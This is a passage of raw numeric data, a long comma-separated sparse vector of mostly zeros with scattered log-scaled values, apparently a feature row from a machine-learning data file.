2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.6931471805599453, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.70805020110221, 0.6931471805599453, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 6.437751649736401, 0.0, 0.0, 0.0, 2.0794415416798357, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 7.471502607305074, 0.0, 1.3862943611198906, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 